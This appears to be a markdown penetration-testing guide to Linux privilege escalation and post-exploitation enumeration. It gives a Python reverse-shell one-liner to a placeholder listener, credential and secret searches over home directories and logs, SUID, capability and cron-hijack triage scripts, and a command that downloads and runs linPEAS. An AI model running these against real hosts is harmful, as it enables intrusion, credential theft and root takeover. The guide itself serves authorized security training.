Linux-Manual-Enumeration.md


Privilege Escalation & Post-Exploitation Enumeration For Linux

This document is a guide to privilege escalation and post-exploitation enumeration on Linux and other Unix-like systems. It collects basic and advanced checks that surface the usual escalation vectors: SUID/SGID binaries, file capabilities, sudo rules, cron jobs, writable files and directories, and leaked credentials. Several of the findings (an unusual SUID binary, a permissive sudo rule, a capability on an interpreter) can be turned into a root shell with the techniques catalogued on GTFOBins.

Table of Contents

  1. Python Reverse Shell & Netcat Listener
  2. Upgrading to a TTY Shell via Python
  3. Basic Post-Exploitation Enumeration Commands
  4. Advanced Privilege Escalation Techniques
  5. Using Automated Tools for Enumeration
  6. Specific Environment Checks

Python Reverse Shell & Netcat Listener

A reverse shell makes the compromised host open an outbound connection to the attacker's machine and attach a shell to it; outbound connections usually pass firewalls and NAT that would block an inbound bind shell. A Netcat listener on the attacker's side waits on the chosen port for that connection.

Python TTY Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.y",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

Run this on the target with 192.168.x.y replaced by the listener's address; use python3 where plain python is not installed. The socket is duplicated onto stdin, stdout and stderr, so the spawned bash reads commands from and writes output to the connection.

Netcat Listener:

nc -nvlp 4444

Start the listener on the attacking machine before triggering the reverse shell: -n skips DNS lookups, -v reports the incoming connection, -l listens and -p sets the port.

Upgrading to a TTY Shell

The shell you get from the one-liner above has no job control, no tab completion, and CTRL+C kills the connection instead of the running command. The steps below turn it into a fully interactive TTY; steps 1, 2, 3 and 6 are typed in the remote shell, steps 4 and 5 in your local terminal.

Step 1: Spawn a Better TTY Shell (remote)

python3 -c 'import pty;pty.spawn("/bin/bash")'

Step 2: Set or Modify PATH Environment Variable (remote)

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp

Minimal shells often start with an incomplete PATH; /tmp at the end lets tools you dropped there run without a path prefix and can be left out if you do not need it.

Step 3: Set TERM so clear, vim, less and other curses programs work (remote)

export TERM=xterm-256color

Step 4: Background the Session: press CTRL+Z in your local terminal to suspend the nc process.

Step 5: Put the Local Terminal in Raw Mode and Resume (local)

stty raw -echo; fg; reset

Raw mode passes CTRL+C, CTRL+Z and tab through to the remote shell instead of the local one, -echo stops every keystroke from being printed twice, and fg resumes nc and hands the keyboard to the remote shell. The trailing reset runs locally once nc exits or is suspended again and takes the local terminal out of raw mode; if the remote prompt looks garbled after fg, type reset there as well.

Step 6: Set Terminal Size (Optional, remote)

stty columns 200 rows 200

Replace 200/200 with the values that stty size prints in your local terminal, otherwise full-screen programs such as vim wrap at the wrong width.
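As an added example that is not part of the original guide, a small attacker-side helper for steps 4 to 6: it reads the real terminal size from stty -a, handling both the GNU/Linux and the BSD/macOS output order, and prints the exact lines to paste into the remote shell so rows and columns match instead of the 200x200 placeholder. The function names and the 50x200 fallback are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not part of the original guide): attacker-side helper for
# the TTY upgrade. It reads the local terminal size from `stty -a` and prints
# the lines to paste into the remote shell after the pty.spawn step.

# parse_stty_size "<output of stty -a>": print "ROWS COLS" or fail.
# GNU/Linux prints "rows 50; columns 200;", BSD/macOS prints
# "50 rows; 200 columns;", so both orders are tried.
parse_stty_size() {
    out=$1
    rows=$(printf '%s\n' "$out" | sed -n -E 's/.*rows ([0-9]+).*/\1/p' | head -n 1)
    cols=$(printf '%s\n' "$out" | sed -n -E 's/.*columns ([0-9]+).*/\1/p' | head -n 1)
    if [ -z "$rows" ]; then
        rows=$(printf '%s\n' "$out" | sed -n -E 's/.*[; ]([0-9]+) rows.*/\1/p' | head -n 1)
        cols=$(printf '%s\n' "$out" | sed -n -E 's/.*[; ]([0-9]+) columns.*/\1/p' | head -n 1)
    fi
    if [ -z "$rows" ] || [ -z "$cols" ]; then
        return 1
    fi
    printf '%s %s\n' "$rows" "$cols"
}

# target_commands ROWS COLS: the remote-side lines (steps 2, 3 and 6).
# /tmp is deliberately not added to PATH here; a writable PATH directory is
# something to look for on the target, not something to create.
target_commands() {
    printf 'export TERM=xterm-256color\n'
    printf 'export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n'
    printf 'stty rows %s columns %s\n' "$1" "$2"
}

# attacker_commands: the local-side sequence (steps 4 and 5) for reference.
attacker_commands() {
    printf '# press CTRL+Z to suspend nc, then:\n'
    printf 'stty raw -echo; fg; reset\n'
}

main() {
    # Without a terminal (for example when run from a script) fall back to a
    # conventional 50x200 (assumed default) so the output is still usable.
    if ! size=$(parse_stty_size "$(stty -a 2>/dev/null)"); then
        size="50 200"
        printf '# no local terminal size found, using %s\n' "$size" >&2
    fi
    set -- $size
    printf '# paste into the remote shell:\n'
    target_commands "$1" "$2"
    printf '# then in your local terminal:\n'
    attacker_commands
}

main
```

Run it in the terminal that holds the nc session (before pressing CTRL+Z) and paste the first block into the remote shell; the printed stty line then matches your real window size.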

Basic Post-Exploitation Enumeration Commands

These commands help identify sensitive information and potential privilege escalation vectors. Most of them work as an unprivileged user; 2>/dev/null hides the permission errors for paths you cannot read.

1. Finding Secret Files

find /home/ -type f -exec ls -lsha {} + 2>/dev/null | grep -Ei 'secret|token|key|api|password|username|db_password|mysql_password|mysql_user|databasepassword|mysql_root_password|credentials|creds|pass'

The grep runs over the ls listing, so this matches on file names (and the rest of the listing line), not on file contents; see item 7 for a content search. Extend the path to /opt, /var/www, /srv and /etc to catch application configuration files.

2. Finding SUID Files

find / -perm -4000 -type f 2>/dev/null

A SUID binary runs with its owner's privileges, usually root. Compare the list against what the distribution ships by default and look up every unfamiliar or custom entry on GTFOBins.

3. Finding SGID Files

find / -perm -2000 -type f 2>/dev/null

4. Finding Capabilities of Files

getcap -r / 2>/dev/null

File capabilities grant a subset of root's privileges without SUID. cap_setuid on an interpreter (python3, perl) or cap_dac_override / cap_dac_read_search on any tool that reads or writes files is effectively root.
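As an added example that is not part of the original guide, the shell functions below take the raw output of the commands in items 2 and 4 on stdin and print only what needs a second look: SUID paths that are not in a baseline of binaries shipped SUID on a stock Debian/Ubuntu install, and getcap entries carrying a capability that commonly yields root, with interpreters marked separately because GTFOBins usually has a one-liner for those. The baseline list, the capability list and the interpreter list are this example's own selection; adjust them for the target's distribution.

```shell
#!/bin/sh
# Added example (not part of the original guide): triage raw SUID and getcap
# output. Pipe the commands from items 2 and 4 into these functions:
#   find / -perm -4000 -type f 2>/dev/null | triage_suid
#   getcap -r / 2>/dev/null | triage_caps

# Binaries that are SUID on a stock Debian/Ubuntu install (example selection,
# extend it for the distribution at hand). Both /bin/x and /usr/bin/x are
# accepted below, since /bin is a symlink to /usr/bin on merged-usr systems.
SUID_BASELINE="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/fusermount3
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1"

# Capabilities that usually amount to root, or to arbitrary file read/write.
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner|cap_setfcap'

# triage_suid: reads one path per line on stdin, prints paths not in the baseline.
triage_suid() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        case "$p" in
            /usr/*) alt=${p#/usr} ;;     # /usr/bin/su -> /bin/su
            *)      alt="/usr$p" ;;      # /bin/su     -> /usr/bin/su
        esac
        if ! printf '%s\n' "$SUID_BASELINE" | grep -qFx -e "$p" -e "$alt"; then
            printf '%s\n' "$p"
        fi
    done
    return 0
}

# triage_caps: reads getcap -r output on stdin and prints the entries that carry
# a dangerous capability, prefixed with "interpreter" or "binary". Both getcap
# output styles are handled, since the path is always the first field:
#   /usr/bin/python3 = cap_setuid+ep     (older libcap)
#   /usr/bin/python3 cap_setuid=ep       (newer libcap)
# Paths containing spaces are not handled.
triage_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        if printf '%s\n' "$line" | grep -Eq "$DANGEROUS_CAPS"; then
            path=${line%% *}
            case "$(basename "$path")" in
                python*|perl*|ruby*|php*|node|gdb|vim) tag=interpreter ;;
                *) tag=binary ;;
            esac
            printf '%s %s\n' "$tag" "$line"
        fi
    done
    return 0
}
```

An "interpreter" line with cap_setuid is normally a direct root shell; a "binary" line needs a look at what the program does with its capability (reads files? writes files? spawns other programs?) before it is useful.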

5. Checking Permissions on /etc/passwd & /etc/shadow

ls -la /etc/passwd && ls -la /etc/shadow && cat /etc/passwd

A writable /etc/passwd lets you add a root user with a password hash of your choosing; a readable /etc/shadow gives you hashes to crack offline.

6. Listing Scheduled Cron Jobs

cat /etc/crontab; ls -al /etc/cron.*; crontab -l; ls -al /var/spool/cron/crontabs 2>/dev/null

The commands are joined with ; rather than && because crontab -l exits non-zero when the user has no crontab, which would otherwise stop the chain. On RPM-based systems per-user crontabs live in /var/spool/cron, and systemd timers are listed with systemctl list-timers --all. For every job, check whether the script it runs, the directory that script lives in, or a directory on the PATH the job uses is writable by you.

7. Searching for Passwords in Home Directory

grep -rniI "password" /home 2>/dev/null

-i also catches Password and PASSWORD, -I skips binary files, -n prints the line number.

8. Checking Sudo Permissions

sudo -l

Look for NOPASSWD entries, rules on binaries that have a GTFOBins sudo entry, wildcards in the allowed arguments, and env_keep settings that preserve variables such as LD_PRELOAD.

9. Reviewing Log Files

grep -rIi -E 'password|token|key' /var/log 2>/dev/null

cat /var/log/* fails on subdirectories and dumps rotated .gz archives as binary; a recursive grep that skips binary files (-I) is both quieter and more complete.

10. Listing Environment Variables

env

11. Accessing User's Bash History

cat ~/.bash_history; cat /home/*/.bash_history 2>/dev/null

Other users' history files are only readable when their permissions are loose, but it costs nothing to try. Also check ~/.zsh_history, ~/.mysql_history and ~/.python_history, which are cleared less often.

12. Checking User and Host Information

whoami && id && hostname

Membership of a group such as docker, lxd, disk, adm or sudo is an escalation path in itself.

13. Finding Writable Files

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

14. Finding Writable Directories:

find / -writable -type d -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

Without the exclusions, /proc and /sys flood the output with pseudo-files. -writable is evaluated for the current user, so the results change with who you are.

15. Finding Executables in PATH

echo $PATH | tr ':' '\n' | xargs -I {} find {} -type f -executable 2>/dev/null

The interesting case is a PATH directory (yours, or the one a cron job or sudo rule runs with) that you can write to and that is searched before the directory holding the real binary: a file of the same name dropped there runs instead.
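As an added example, not from the original guide, the script below automates what items 6 and 15 have you do by eye: it parses system-crontab lines (the /etc/crontab and /etc/cron.d format with a user field), reports jobs whose script or script directory is world-writable, and for commands given without a path lists the directories in the crontab's PATH that are searched before the real binary and that you could drop a file into. Only the o+w bit is tested because that result does not depend on which user runs the check; group-writable paths, which need a comparison with id -G, are left out. The function names and output labels are this example's own.

```shell
#!/bin/sh
# Added example (not from the original guide): find cron jobs that an
# unprivileged user can hijack. Usage on a target:
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | check_crontab
# Only world-writable (o+w) paths are reported; group-writable ones are not.

# world_writable PATH: true if PATH exists and any user may write to it.
world_writable() {
    [ -e "$1" ] && [ -n "$(find "$1" -maxdepth 0 -perm -0002 2>/dev/null)" ]
}

# writable_path_dirs "A:B:C": print each directory that is world-writable or
# missing. A sticky world-writable dir (1777) still lets you create new names.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        [ -n "$d" ] || continue
        if [ ! -d "$d" ]; then
            printf 'MISSING %s\n' "$d"
        elif world_writable "$d"; then
            printf 'WRITABLE %s\n' "$d"
        fi
    done
}

# hijackable_dirs NAME "A:B:C": for a command run without a slash, print the
# PATH directories searched before the one holding NAME that are world-writable
# or missing. A file called NAME dropped there runs as the cron user.
hijackable_dirs() {
    name=$1
    printf '%s\n' "$2" | tr ':' '\n' | while IFS= read -r d; do
        [ -n "$d" ] || continue
        if [ -x "$d/$name" ]; then break; fi   # the real binary; later dirs are never reached
        if [ ! -d "$d" ]; then
            printf 'MISSING %s\n' "$d"
        elif world_writable "$d"; then
            printf 'WRITABLE %s\n' "$d"
        fi
    done
}

# check_crontab: reads system-crontab text on stdin and prints findings.
check_crontab() {
    cronpath=/usr/bin:/bin            # cron's default PATH when the file sets none
    while read -r line; do
        case "$line" in
            ''|'#'*) continue ;;
            PATH=*)  cronpath=$(printf '%s' "${line#PATH=}" | tr -d '"'); continue ;;
            [A-Za-z_]*=*) continue ;;  # SHELL=, MAILTO= and other assignments
        esac
        # Drop the schedule (5 fields, or one @keyword) and the user field.
        case "$line" in
            @*) cmd=$(printf '%s\n' "$line" | awk '{ $1 = ""; $2 = ""; sub(/^ +/, ""); print }') ;;
            *)  cmd=$(printf '%s\n' "$line" | awk '{ for (i = 1; i <= 6; i++) $i = ""; sub(/^ +/, ""); print }') ;;
        esac
        prog=${cmd%% *}
        case "$prog" in
            */*)
                if world_writable "$prog"; then printf 'WRITABLE-SCRIPT %s\n' "$prog"; fi
                if world_writable "$(dirname "$prog")"; then printf 'WRITABLE-DIR %s\n' "$(dirname "$prog")"; fi
                ;;
            *)
                hijackable_dirs "$prog" "$cronpath" | while IFS= read -r hit; do
                    printf 'HIJACK %s via %s\n' "$prog" "$hit"
                done
                ;;
        esac
    done
    return 0
}
```

WRITABLE-SCRIPT means you can edit what root runs; WRITABLE-DIR means you can replace the script even if the file itself is read-only (rename it away and create a new one); HIJACK lines name a directory where a file with the command's name would shadow the real binary. Per-user crontabs (crontab -l) have no user field, so strip only the first five fields for those.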

Advanced Privilege Escalation Techniques

These checks go deeper into the system's configuration to find escalation opportunities:

  1. Network Configuration: netstat -tuln (or ss -tulnp where netstat is not installed). Services bound to 127.0.0.1 only are reachable now that you are on the host and often have weaker authentication.
  2. Checking Installed Software for Debian-based systems: dpkg -l
  3. Checking Installed Software for RPM-based systems: rpm -qa
  4. Checking Kernel and Distribution Version: uname -a; cat /etc/os-release. Note the exact versions before searching for public exploits, and prefer misconfiguration-based paths over kernel exploits, which can crash the host.
  5. Finding World-Writable Binaries: find / -perm -o+w -type f -not -path "/proc/*" 2>/dev/null. The often-quoted -perm -222 only matches files writable by user, group and others at once; -o+w matches every file that any user can modify.
  6. Recently Modified Files: find / -type f -mtime -7 -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null. Files changed in the last seven days point to recent admin activity, custom scripts and deployment artefacts.

Using Automated Tools for Enumeration

wget -O linpeas.sh https://linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

Without -O, wget saves the download as index.html, so the chmod on linpeas.sh fails. linPEAS runs most of the checks above in one pass, but it is noisy, writes to disk and is commonly flagged by endpoint security, so read its output critically and fall back to the manual commands where needed.

Specific Environment Checks

  • For macOS: ls -la /private/var/log. Most of the Linux checks above carry over, but the BSD find on macOS lacks -writable and -executable; use -perm instead.
  • For Containers: from inside, ls -la /.dockerenv and cat /proc/1/cgroup often reveal a Docker container, and a mounted /var/run/docker.sock means you can drive the host's Docker daemon. From the host, docker inspect <container_id> shows the container's mounts, capabilities and whether it runs privileged.

This guide is intended for educational and authorized security testing purposes only. Please always make sure you have explicit permission before conducting any security assessments.